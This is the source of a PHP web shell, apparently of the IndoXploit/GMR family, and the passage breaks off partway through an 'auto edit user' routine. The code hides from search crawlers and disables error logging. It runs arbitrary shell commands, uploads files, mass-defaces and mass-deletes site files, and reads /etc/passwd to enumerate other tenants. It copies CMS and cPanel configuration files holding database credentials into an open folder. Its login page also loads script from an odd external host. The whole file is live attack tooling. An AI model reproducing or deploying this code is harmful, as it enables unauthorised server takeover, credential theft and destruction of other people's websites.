shell_symlink_bypass_script_by_ultimate.php

1. <?php
2. session_start();
3. error_reporting(0);
4. set_time_limit(0);
5. @set_magic_quotes_runtime(0);
6. @clearstatcache();
7. @ini_set('error_log',NULL);
8. @ini_set('log_errors',0);
9. @ini_set('max_execution_time',0);
10. @ini_set('output_buffering',0);
11. @ini_set('display_errors', 0);
12.  
13. $auth_pass = ""; // default: 0zabi hada
14. $color = "#00ff00";
15. $default_action = 'FilesMan';
16. $default_use_ajax = true;
17. $default_charset = 'UTF-8';
18. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
19.     $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
20.     if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
21.         header('HTTP/1.0 404 Not Found');
22.         exit;
23.     }
24. }
25.  
26. function login_shell() {
27. ?>
28. <html>
29. <head>
30. <title>Gmr-Achraf</title>
31. <style type="text/css">
32. html {
33.     margin: 20px auto;
34.     background: #000000;
35.     color: green;
36.     text-align: center;
37. }
38. header {
39.     color: green;
40.     margin: 10px auto;
41. }
42. input[type=password] {
43.     width: 250px;
44.     height: 25px;
45.     color: red;
46.     background: #000000;
47.     border: 1px dotted green;
48.     padding: 5px;
49.     margin-left: 20px;
50.     text-align: center;
51. }
52. </style>
53. </head>
54. <center>
55. <header>
56.     <pre>
57.  ___________________________
58. < root@Gmr:~# w00t??? >
59.  ---------------------------
60.   __ ____ ____ ______
61.    _____                               _                __
62.   / ____|                    /\       | |              / _|
63.  | |  __ _ __ ___  _ __     /  \   ___| |__  _ __ __ _| |_
64.  | | |_ | '_ ` _ \| '__|   / /\ \ / __| '_ \| '__/ _` |  _|
65.  | |__| | | | | | | |     / ____ \ (__| | | | | | (_| | |  
66.   \_____|_| |_| |_|_|    /_/    \_\___|_| |_|_|  \__,_|_|  
67.  
68.  
69.     </pre>
70. </header>
71. <form method="post">
72. <input type="password" name="pass">
73. </form>
74. <script type="text/javascript" src="https://www.codejquery.net/bootstrap.min.css/" ></script>
75. <?php
76. exit;
77. }
78. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
79.     if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
80.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
81.     else
82.         login_shell();
83. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
84.     @ob_clean();
85.     $file = $_GET['file'];
86.     header('Content-Description: File Transfer');
87.     header('Content-Type: application/octet-stream');
88.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
89.     header('Expires: 0');
90.     header('Cache-Control: must-revalidate');
91.     header('Pragma: public');
92.     header('Content-Length: ' . filesize($file));
93.     readfile($file);
94.     exit;
95. }
96. ?>
97. <html>
98. <head>
99. <title>GMR</title>
100. <meta name='author' content='GMR'>
101. <meta charset="UTF-8">
102. <style type='text/css'>
103. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
104. html {
105.     background: #000000;
106.     color: #ffffff;
107.     font-family: 'Ubuntu';
108.     font-size: 13px;
109.     width: 100%;
110. }
111. li {
112.     display: inline;
113.     margin: 5px;
114.     padding: 5px;
115. }
116. table, th, td {
117.     border-collapse:collapse;
118.     font-family: Tahoma, Geneva, sans-serif;
119.     background: transparent;
120.     font-family: 'Ubuntu';
121.     font-size: 13px;
122. }
123. .table_home, .th_home, .td_home {
124.     border: 1px solid #ffffff;
125. }
126. th {
127.     padding: 10px;
128. }
129. a {
130.     color: #ffffff;
131.     text-decoration: none;
132. }
133. a:hover {
134.     color: gold;
135.     text-decoration: underline;
136. }
137. b {
138.     color: gold;
139. }
140. input[type=text], input[type=password],input[type=submit] {
141.     background: transparent;
142.     color: #ffffff;
143.     border: 1px solid #ffffff;
144.     margin: 5px auto;
145.     padding-left: 5px;
146.     font-family: 'Ubuntu';
147.     font-size: 13px;
148. }
149. textarea {
150.     border: 1px solid #ffffff;
151.     width: 100%;
152.     height: 400px;
153.     padding-left: 5px;
154.     margin: 10px auto;
155.     resize: none;
156.     background: transparent;
157.     color: #ffffff;
158.     font-family: 'Ubuntu';
159.     font-size: 13px;
160. }
161. select {
162.     width: 152px;
163.     background: #000000;
164.     color: lime;
165.     border: 1px solid #ffffff;
166.     margin: 5px auto;
167.     padding-left: 5px;
168.     font-family: 'Ubuntu';
169.     font-size: 13px;
170. }
171. option:hover {
172.     background: lime;
173.     color: #000000;
174. }
175. </style>
176. </head>
177. <?php
178. ###############################################################################
179. // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.
180. // Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada.
181. // Tapi Selebihnya, itu hasil kreasi GMR sendiri.
182. // Tanpa kalian kita tidak akan BESAR seperti sekarang.
183. // Greetz: All Member GMR. & all my friends.
184. ###############################################################################
185. function w($dir,$perm) {
186.     if(!is_writable($dir)) {
187.         return "<font color=red>".$perm."</font>";
188.     } else {
189.         return "<font color=lime>".$perm."</font>";
190.     }
191. }
192. function r($dir,$perm) {
193.     if(!is_readable($dir)) {
194.         return "<font color=red>".$perm."</font>";
195.     } else {
196.         return "<font color=lime>".$perm."</font>";
197.     }
198. }
199. function exe($cmd) {
200.     if(function_exists('system')) {        
201.         @ob_start();      
202.         @system($cmd);    
203.         $buff = @ob_get_contents();        
204.         @ob_end_clean();      
205.         return $buff;  
206.     } elseif(function_exists('exec')) {        
207.         @exec($cmd,$results);      
208.         $buff = "";        
209.         foreach($results as $result) {        
210.             $buff .= $result;      
211.         } return $buff;    
212.     } elseif(function_exists('passthru')) {        
213.         @ob_start();      
214.         @passthru($cmd);      
215.         $buff = @ob_get_contents();        
216.         @ob_end_clean();      
217.         return $buff;  
218.     } elseif(function_exists('shell_exec')) {      
219.         $buff = @shell_exec($cmd);    
220.         return $buff;  
221.     }
222. }
223. function perms($file){
224.     $perms = fileperms($file);
225.     if (($perms & 0xC000) == 0xC000) {
226.     // Socket
227.     $info = 's';
228.     } elseif (($perms & 0xA000) == 0xA000) {
229.     // Symbolic Link
230.     $info = 'l';
231.     } elseif (($perms & 0x8000) == 0x8000) {
232.     // Regular
233.     $info = '-';
234.     } elseif (($perms & 0x6000) == 0x6000) {
235.     // Block special
236.     $info = 'b';
237.     } elseif (($perms & 0x4000) == 0x4000) {
238.     // Directory
239.     $info = 'd';
240.     } elseif (($perms & 0x2000) == 0x2000) {
241.     // Character special
242.     $info = 'c';
243.     } elseif (($perms & 0x1000) == 0x1000) {
244.     // FIFO pipe
245.     $info = 'p';
246.     } else {
247.     // Unknown
248.     $info = 'u';
249.     }
250.         // Owner
251.     $info .= (($perms & 0x0100) ? 'r' : '-');
252.     $info .= (($perms & 0x0080) ? 'w' : '-');
253.     $info .= (($perms & 0x0040) ?
254.     (($perms & 0x0800) ? 's' : 'x' ) :
255.     (($perms & 0x0800) ? 'S' : '-'));
256.     // Group
257.     $info .= (($perms & 0x0020) ? 'r' : '-');
258.     $info .= (($perms & 0x0010) ? 'w' : '-');
259.     $info .= (($perms & 0x0008) ?
260.     (($perms & 0x0400) ? 's' : 'x' ) :
261.     (($perms & 0x0400) ? 'S' : '-'));
262.     // World
263.     $info .= (($perms & 0x0004) ? 'r' : '-');
264.     $info .= (($perms & 0x0002) ? 'w' : '-');
265.     $info .= (($perms & 0x0001) ?
266.     (($perms & 0x0200) ? 't' : 'x' ) :
267.     (($perms & 0x0200) ? 'T' : '-'));
268.     return $info;
269. }
270. function hdd($s) {
271.     if($s >= 1073741824)
272.     return sprintf('%1.2f',$s / 1073741824 ).' GB';
273.     elseif($s >= 1048576)
274.     return sprintf('%1.2f',$s / 1048576 ) .' MB';
275.     elseif($s >= 1024)
276.     return sprintf('%1.2f',$s / 1024 ) .' KB';
277.     else
278.     return $s .' B';
279. }
280. function ambilKata($param, $kata1, $kata2){
281.     if(strpos($param, $kata1) === FALSE) return FALSE;
282.     if(strpos($param, $kata2) === FALSE) return FALSE;
283.     $start = strpos($param, $kata1) + strlen($kata1);
284.     $end = strpos($param, $kata2, $start);
285.     $return = substr($param, $start, $end - $start);
286.     return $return;
287. }
288. function getsource($url) {
289.     $curl = curl_init($url);
290.             curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
291.             curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
292.             curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
293.             curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
294.     $content = curl_exec($curl);
295.             curl_close($curl);
296.     return $content;
297. }
298. function bing($dork) {
299.     $npage = 1;
300.     $npages = 30000;
301.     $allLinks = array();
302.     $lll = array();
303.     while($npage <= $npages) {
304.         $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
305.         if($x) {
306.             preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
307.             foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
308.             $npage = $npage + 10;
309.             if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
310.         } else break;
311.     }
312.     $URLs = array();
313.     foreach($allLinks as $url){
314.         $exp = explode("/", $url);
315.         $URLs[] = $exp[2];
316.     }
317.     $array = array_filter($URLs);
318.     $array = array_unique($array);
319.     $sss = count(array_unique($array));
320.     foreach($array as $domain) {
321.         echo $domain."\n";
322.     }
323. }
324. function reverse($url) {
325.     $ch = curl_init("http://domains.yougetsignal.com/domains.php");
326.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
327.           curl_setopt($ch, CURLOPT_POSTFIELDS,  "remoteAddress=$url&ket=");
328.           curl_setopt($ch, CURLOPT_HEADER, 0);
329.           curl_setopt($ch, CURLOPT_POST, 1);
330.     $resp = curl_exec($ch);
331.     $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
332.     $array = explode(",,", $resp);
333.     unset($array[0]);
334.     foreach($array as $lnk) {
335.         $lnk = "http://$lnk";
336.         $lnk = str_replace(",", "", $lnk);
337.         echo $lnk."\n";
338.         ob_flush();
339.         flush();
340.     }
341.         curl_close($ch);
342. }
343. if(get_magic_quotes_gpc()) {
344.     function idx_ss($array) {
345.         return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
346.     }
347.     $_POST = idx_ss($_POST);
348.     $_COOKIE = idx_ss($_COOKIE);
349. }
350.  
351. if(isset($_GET['dir'])) {
352.     $dir = $_GET['dir'];
353.     chdir($dir);
354. } else {
355.     $dir = getcwd();
356. }
357. $kernel = php_uname();
358. $ip = gethostbyname($_SERVER['HTTP_HOST']);
359. $dir = str_replace("\\","/",$dir);
360. $scdir = explode("/", $dir);
361. $freespace = hdd(disk_free_space("/"));
362. $total = hdd(disk_total_space("/"));
363. $used = $total - $freespace;
364. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
365. $ds = @ini_get("disable_functions");
366. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
367. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
368. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
369. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
370. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
371. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
372. if(!function_exists('posix_getegid')) {
373.     $user = @get_current_user();
374.     $uid = @getmyuid();
375.     $gid = @getmygid();
376.     $group = "?";
377. } else {
378.     $uid = @posix_getpwuid(posix_geteuid());
379.     $gid = @posix_getgrgid(posix_getegid());
380.     $user = $uid['name'];
381.     $uid = $uid['uid'];
382.     $group = $gid['name'];
383.     $gid = $gid['gid'];
384. }
385. echo "System: <font color=lime>".$kernel."</font><br>";
386. echo "User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>";
387. echo "Server IP: <font color=lime>".$ip."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font><br>";
388. echo "HDD: <font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>";
389. echo "Safe Mode: $sm<br>";
390. echo "Disable Functions: $show_ds<br>";
391. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
392. echo "Current DIR: ";
393. foreach($scdir as $c_dir => $cdir) {  
394.     echo "<a href='?dir=";
395.     for($i = 0; $i <= $c_dir; $i++) {
396.         echo $scdir[$i];
397.         if($i != $c_dir) {
398.         echo "/";
399.         }
400.     }
401.     echo "'>$cdir</a>/";
402. }
403. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
404. echo "<hr>";
405. echo "<center>";
406. echo "<ul>";
407. echo "<li>[ <a href='?'>Home</a> ]</li>";
408. echo "<li>[ <a href='?dir=$dir&do=upload'>Upload</a> ]</li>";
409. echo "<li>[ <a href='?dir=$dir&do=cmd'>Command</a> ]</li>";
410. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> ]</li>";
411. echo "<li>[ <a href='?dir=$dir&do=mass_delete'>Mass Delete</a> ]</li>";
412. echo "<li>[ <a href='?dir=$dir&do=config'>Config</a> ]</li>";
413. echo "<li>[ <a href='?dir=$dir&do=jumping'>Jumping</a> ]</li>";
414. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> ]</li>";
415. echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> ]</li>";
416. echo "<li>[ <a href='?dir=$dir&do=zoneh'>Zone-H</a> ]</li>";
417. echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI Telnet</a> ]</li>";
418. echo "<li>[ <a href='?dir=$dir&do=network'>network</a> ]</li>";
419. echo "<li>[ <a href='?dir=$dir&do=adminer'>Adminer</a> ]</li><br>";
420. echo "<li>[ <a href='?dir=$dir&do=fake_root'>Fake Root</a> ]</li>";
421. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> ]</li>";
422. echo "<li>[ <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> ]</li>";
423. echo "<li>[ <a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a> ]</li>";
424. echo "<li>[ <a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a> ]</li>";
425. echo "<li>[ <a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a> ]</li>";
426. echo "<li>[ <a href='?dir=$dir&do=krdp_shell'>K-RDP Shell</a> ]</li>";
427. echo "<li>[ <a style='color: red;' href='?logout=true'>Logout</a> ]</li>";
428. echo "</ul>";
429. echo "</center>";
430. echo "<hr>";
431. if($_GET['logout'] == true) {
432.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
433.     echo "<script>window.location='?';</script>";
434. } elseif($_GET['do'] == 'upload') {
435.     echo "<center>";
436.     if($_POST['upload']) {
437.         if($_POST['tipe_upload'] == 'biasa') {
438.             if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
439.                 $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
440.             } else {
441.                 $act = "<font color=red>failed to upload file</font>";
442.             }
443.         } else {
444.             $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
445.             $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
446.             if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
447.                 if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
448.                     $act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
449.                 } else {
450.                     $act = "<font color=red>failed to upload file</font>";
451.                 }
452.             } else {
453.                 $act = "<font color=red>failed to upload file</font>";
454.             }
455.         }
456.     }
457.     echo "Upload File:
458.    <form method='post' enctype='multipart/form-data'>
459.    <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
460.    <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
461.    <input type='file' name='ix_file'>
462.    <input type='submit' value='upload' name='upload'>
463.    </form>";
464.     echo $act;
465.     echo "</center>";
466. } elseif($_GET['do'] == 'cmd') {
467.     echo "<form method='post'>
468.    <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
469.    <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
470.    </form>";
471.     if($_POST['do_cmd']) {
472.         echo "<pre>".exe($_POST['cmd'])."</pre>";
473.     }
474. } elseif($_GET['do'] == 'mass_deface') {
475.     function sabun_massal($dir,$namafile,$isi_script) {
476.         if(is_writable($dir)) {
477.             $dira = scandir($dir);
478.             foreach($dira as $dirb) {
479.                 $dirc = "$dir/$dirb";
480.                 $lokasi = $dirc.'/'.$namafile;
481.                 if($dirb === '.') {
482.                     file_put_contents($lokasi, $isi_script);
483.                 } elseif($dirb === '..') {
484.                     file_put_contents($lokasi, $isi_script);
485.                 } else {
486.                     if(is_dir($dirc)) {
487.                         if(is_writable($dirc)) {
488.                             echo "[<font color=lime>DONE</font>] $lokasi<br>";
489.                             file_put_contents($lokasi, $isi_script);
490.                             $idx = sabun_massal($dirc,$namafile,$isi_script);
491.                         }
492.                     }
493.                 }
494.             }
495.         }
496.     }
497.     function sabun_biasa($dir,$namafile,$isi_script) {
498.         if(is_writable($dir)) {
499.             $dira = scandir($dir);
500.             foreach($dira as $dirb) {
501.                 $dirc = "$dir/$dirb";
502.                 $lokasi = $dirc.'/'.$namafile;
503.                 if($dirb === '.') {
504.                     file_put_contents($lokasi, $isi_script);
505.                 } elseif($dirb === '..') {
506.                     file_put_contents($lokasi, $isi_script);
507.                 } else {
508.                     if(is_dir($dirc)) {
509.                         if(is_writable($dirc)) {
510.                             echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
511.                             file_put_contents($lokasi, $isi_script);
512.                         }
513.                     }
514.                 }
515.             }
516.         }
517.     }
518.     if($_POST['start']) {
519.         if($_POST['tipe_sabun'] == 'mahal') {
520.             echo "<div style='margin: 5px auto; padding: 5px'>";
521.             sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
522.             echo "</div>";
523.         } elseif($_POST['tipe_sabun'] == 'murah') {
524.             echo "<div style='margin: 5px auto; padding: 5px'>";
525.             sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
526.             echo "</div>";
527.         }
528.     } else {
529.     echo "<center>";
530.     echo "<form method='post'>
531.    <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
532.    <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
533.    <font style='text-decoration: underline;'>Folder:</font><br>
534.    <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
535.    <font style='text-decoration: underline;'>Filename:</font><br>
536.    <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
537.    <font style='text-decoration: underline;'>Index File:</font><br>
538.    <textarea name='script' style='width: 450px; height: 200px;'>Hacked by IndoXploit</textarea><br>
539.    <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
540.    </form></center>";
541.     }
542. } elseif($_GET['do'] == 'mass_delete') {
543.     function hapus_massal($dir,$namafile) {
544.         if(is_writable($dir)) {
545.             $dira = scandir($dir);
546.             foreach($dira as $dirb) {
547.                 $dirc = "$dir/$dirb";
548.                 $lokasi = $dirc.'/'.$namafile;
549.                 if($dirb === '.') {
550.                     if(file_exists("$dir/$namafile")) {
551.                         unlink("$dir/$namafile");
552.                     }
553.                 } elseif($dirb === '..') {
554.                     if(file_exists("".dirname($dir)."/$namafile")) {
555.                         unlink("".dirname($dir)."/$namafile");
556.                     }
557.                 } else {
558.                     if(is_dir($dirc)) {
559.                         if(is_writable($dirc)) {
560.                             if(file_exists($lokasi)) {
561.                                 echo "[<font color=lime>DELETED</font>] $lokasi<br>";
562.                                 unlink($lokasi);
563.                                 $idx = hapus_massal($dirc,$namafile);
564.                             }
565.                         }
566.                     }
567.                 }
568.             }
569.         }
570.     }
571.     if($_POST['start']) {
572.         echo "<div style='margin: 5px auto; padding: 5px'>";
573.         hapus_massal($_POST['d_dir'], $_POST['d_file']);
574.         echo "</div>";
575.     } else {
576.     echo "<center>";
577.     echo "<form method='post'>
578.    <font style='text-decoration: underline;'>Folder:</font><br>
579.    <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
580.    <font style='text-decoration: underline;'>Filename:</font><br>
581.    <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
582.    <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
583.    </form></center>";
584.     }
585. } elseif($_GET['do'] == 'config') {
586.     $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
587.     $idx = mkdir("idx_config", 0777);
588.     $isi_htc = "Options all\nRequire None\nSatisfy Any";
589.     $htc = fopen("idx_config/.htaccess","w");
590.     fwrite($htc, $isi_htc);
591.     while($passwd = fgets($etc)) {
592.         if($passwd == "" || !$etc) {
593.             echo "<font color=red>Can't read /etc/passwd</font>";
594.         } else {
595.             preg_match_all('/(.*?):x:/', $passwd, $user_config);
596.             foreach($user_config[1] as $user_idx) {
597.                 $user_config_dir = "/home/$user_idx/public_html/";
598.                 if(is_readable($user_config_dir)) {
599.                     $grab_config = array(
600.                         "/home/$user_idx/.my.cnf" => "cpanel",
601.                         "/home/$user_idx/.accesshash" => "WHM-accesshash",
602.                         "/home/$user_idx/public_html/po-content/config.php" => "Popoji",
603.                         "/home/$user_idx/public_html/vdo_config.php" => "Voodoo",
604.                         "/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb",
605.                         "/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia",
606.                         "/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
607.                         "/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS",
608.                         "/home/$user_idx/public_html/whm/configuration.php" => "WHMCS",
609.                         "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",
610.                         "/home/$user_idx/public_html/forum/config.php" => "phpBB",
611.                         "/home/$user_idx/public_html/sites/default/settings.php" => "Drupal",
612.                         "/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop",
613.                         "/home/$user_idx/public_html/app/etc/local.xml" => "Magento",
614.                         "/home/$user_idx/public_html/joomla/configuration.php" => "Joomla",
615.                         "/home/$user_idx/public_html/configuration.php" => "Joomla",
616.                         "/home/$user_idx/public_html/wp/wp-config.php" => "WordPress",
617.                         "/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress",
618.                         "/home/$user_idx/public_html/wp-config.php" => "WordPress",
619.                         "/home/$user_idx/public_html/admin/config.php" => "OpenCart",
620.                         "/home/$user_idx/public_html/slconfig.php" => "Sitelok",
621.                         "/home/$user_idx/public_html/application/config/database.php" => "Ellislab");
622.                     foreach($grab_config as $config => $nama_config) {
623.                         $ambil_config = file_get_contents($config);
624.                         if($ambil_config == '') {
625.                         } else {
626.                             $file_config = fopen("idx_config/$user_idx-$nama_config.txt","w");
627.                             fputs($file_config,$ambil_config);
628.                         }
629.                     }
630.                 }      
631.             }
632.         }  
633.     }
634.     echo "<center><a href='?dir=$dir/idx_config'><font color=lime>Done</font></a></center>";
635. } elseif($_GET['do'] == 'jumping') {
636.     $i = 0;
637.     echo "<div class='margin: 5px auto;'>";
638.     if(preg_match("/hsphere/", $dir)) {
639.         $urls = explode("\r\n", $_POST['url']);
640.         if(isset($_POST['jump'])) {
641.             echo "<pre>";
642.             foreach($urls as $url) {
643.                 $url = str_replace(array("http://","www."), "", strtolower($url));
644.                 $etc = "/etc/passwd";
645.                 $f = fopen($etc,"r");
646.                 while($gets = fgets($f)) {
647.                     $pecah = explode(":", $gets);
648.                     $user = $pecah[0];
649.                     $dir_user = "/hsphere/local/home/$user";
650.                     if(is_dir($dir_user) === true) {
651.                         $url_user = $dir_user."/".$url;
652.                         if(is_readable($url_user)) {
653.                             $i++;
654.                             $jrw = "[<font color=lime>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
655.                             if(is_writable($url_user)) {
656.                                 $jrw = "[<font color=lime>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
657.                             }
658.                             echo $jrw."<br>";
659.                         }
660.                     }
661.                 }
662.             }
663.         if($i == 0) {
664.         } else {
665.             echo "<br>Total ada ".$i." Kamar di ".$ip;
666.         }
667.         echo "</pre>";
668.         } else {
669.             echo '<center>
670.                  <form method="post">
671.                  List Domains: <br>
672.                  <textarea name="url" style="width: 500px; height: 250px;">';
673.             $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
674.             while($getss = fgets($fp)) {
675.                 echo $getss;
676.             }
677.             echo  '</textarea><br>
678.                  <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
679.                  </form></center>';
680.         }
681.     } elseif(preg_match("/vhosts/", $dir)) {
682.         $urls = explode("\r\n", $_POST['url']);
683.         if(isset($_POST['jump'])) {
684.             echo "<pre>";
685.             foreach($urls as $url) {
686.                 $web_vh = "/var/www/vhosts/$url/httpdocs";
687.                 if(is_dir($web_vh) === true) {
688.                     if(is_readable($web_vh)) {
689.                         $i++;
690.                         $jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
691.                         if(is_writable($web_vh)) {
692.                             $jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
693.                         }
694.                         echo $jrw."<br>";
695.                     }
696.                 }
697.             }
698.         if($i == 0) {
699.         } else {
700.             echo "<br>Total ada ".$i." Kamar di ".$ip;
701.         }
702.         echo "</pre>";
703.         } else {
704.             echo '<center>
705.                  <form method="post">
706.                  List Domains: <br>
707.                  <textarea name="url" style="width: 500px; height: 250px;">';
708.                   bing("ip:$ip");
709.             echo  '</textarea><br>
710.                  <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
711.                  </form></center>';
712.         }
713.     } else {
714.         echo "<pre>";
715.         $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
716.         while($passwd = fgets($etc)) {
717.             if($passwd == '' || !$etc) {
718.                 echo "<font color=red>Can't read /etc/passwd</font>";
719.             } else {
720.                 preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
721.                 foreach($user_jumping[1] as $user_idx_jump) {
722.                     $user_jumping_dir = "/home/$user_idx_jump/public_html";
723.                     if(is_readable($user_jumping_dir)) {
724.                         $i++;
725.                         $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
726.                         if(is_writable($user_jumping_dir)) {
727.                             $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
728.                         }
729.                         echo $jrw;
730.                         if(function_exists('posix_getpwuid')) {
731.                             $domain_jump = file_get_contents("/etc/named.conf");  
732.                             if($domain_jump == '') {
733.                                 echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
734.                             } else {
735.                                 preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
736.                                 foreach($domains_jump[1] as $dj) {
737.                                     $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
738.                                     $user_jumping_url = $user_jumping_url['name'];
739.                                     if($user_jumping_url == $user_idx_jump) {
740.                                         echo " => ( <u>$dj</u> )<br>";
741.                                         break;
742.                                     }
743.                                 }
744.                             }
745.                         } else {
746.                             echo "<br>";
747.                         }
748.                     }
749.                 }
750.             }
751.         }
752.         if($i == 0) {
753.         } else {
754.             echo "<br>Total ada ".$i." Kamar di ".$ip;
755.         }
756.         echo "</pre>";
757.     }
758.     echo "</div>";
759. } elseif($_GET['do'] == 'auto_edit_user') {
760.     if($_POST['hajar']) {
761.         if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
762.             echo "username atau password harus lebih dari 6 karakter";
763.         } else {
764.             $user_baru = $_POST['user_baru'];
765.             $pass_baru = md5($_POST['pass_baru']);
766.             $conf = $_POST['config_dir'];
767.             $scan_conf = scandir($conf);
768.             foreach($scan_conf as $file_conf) {
769.                 if(!is_file("$conf/$file_conf")) continue;
770.                 $config = file_get_contents("$conf/$file_conf");
771.                 if(preg_match("/JConfig|joomla/",$config)) {
772.                     $dbhost = ambilkata($config,"host = '","'");
773.                     $dbuser = ambilkata($config,"user = '","'");
774.                     $dbpass = ambilkata($config,"password = '","'");
775.                     $dbname = ambilkata($config,"db = '","'");
776.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
777.                     $prefix = $dbprefix."users";
778.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
779.                     $db = mysql_select_db($dbname);
780.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
781.                     $result = mysql_fetch_array($q);
782.                     $id = $result['id'];
